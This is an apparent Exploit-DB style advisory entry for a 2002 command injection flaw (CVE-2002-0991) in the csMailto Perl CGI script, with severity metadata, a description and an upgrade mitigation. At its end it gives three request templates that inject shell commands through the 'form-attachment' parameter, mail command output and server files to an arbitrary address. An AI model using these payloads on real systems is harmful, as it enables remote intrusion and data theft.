CSMailto Command Injection

vendor:

csMailto

by:

SecurityFocus

8.8

CVSS

HIGH

Command Injection

CWE

Product Name: csMailto

Affected Version From: Unknown

Affected Version To: Unknown

Patch Exists: Yes

Related CWE: CVE-2002-0991

CPE: a:cgiscript.net:csmailto

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: Unknown

2002

CSMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script, where configuration values used by the script are contained in hidden form values. As a result, a remote attacker may trivially modify these values between script invocations, allowing them to execute arbitrary commands on the vulnerable system.

Mitigation:

Upgrade to the latest version of CSMailto.

Source

Exploit-DB raw data:

source: https://www.securityfocus.com/bid/4579/info

CGIScript.NET csMailto is a Perl script designed to support multiple mailto: forms. A vulnerability has been reported in some versions of this script.

Reportedly, configuration values used by the script are contained in hidden form values. As a result, a remote attacker may trivially modify these values between script invocations. Consequences include arbitrary command execution on the vulnerable system.

- execute commands on server

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&command=mailform

- execute command on server and mail output to anyone

CSMailto.cgi?form-attachment=SHELL_COMMANDS_HERE|&Email=user@host.com&form-autoresponse=YES&command=mailform

- email server file to anyone

CSMailto.cgi?form-attachment=FILEPATH_HERE&Email=user@host.com&form-autoresponse=YES&command=mailform